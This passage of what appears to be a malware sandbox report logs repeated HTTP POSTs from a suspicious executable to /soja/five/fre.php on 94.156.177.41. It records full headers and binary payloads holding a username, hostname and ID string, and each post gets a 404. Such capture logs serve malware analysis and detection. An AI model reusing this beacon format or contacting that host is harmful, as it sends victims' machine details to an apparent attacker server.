                                    Nov 28, 2024 13:52:53.728328943 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:55.119847059 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:54 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.54981194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:55.408077955 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:55.529062986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:57.817408085 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:57 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.54981894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:58.090461969 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:58.217591047 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:59.638304949 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:59 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.54982494.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:00.214221001 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:00.334230900 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:01.635416031 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.54982994.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:01.899885893 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:02.019879103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:03.487888098 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.54983394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:03.758269072 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:03.878355980 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:05.350589037 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:05 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.54983794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:05.617727041 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:05.737922907 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:07.207684994 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.54984094.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:07.475994110 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:07.602576971 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:09.113989115 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:08 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.54984594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:09.386234045 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:09.650403023 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:11.552810907 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.54985194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:11.821815968 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:11.943752050 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:13.408107996 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:13 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.54985794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:13.666663885 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:13.787378073 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:15.302839041 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:15 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.54986294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:15.575089931 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:15.696851015 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:16.968163013 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:16 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.54986794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:17.259123087 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:17.383644104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:18.852303982 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:18 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.54987194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:19.118278027 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:19.396127939 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:20.909887075 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:20 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.54987794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:21.180269957 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:21.301001072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:22.780473948 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:22 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.54988294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:23.039669991 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:23.160248041 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:24.492685080 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:24 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.54988894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:24.817872047 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:24.944914103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:26.320647955 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:26 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.54989394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:26.586136103 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:26.713138103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:28.140003920 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:27 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.54989794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:28.407987118 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:28.528183937 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:30.067215919 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:29 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.54990294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:30.555847883 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:30.675909996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:32.107141972 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:31 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.54990894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:32.370172977 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
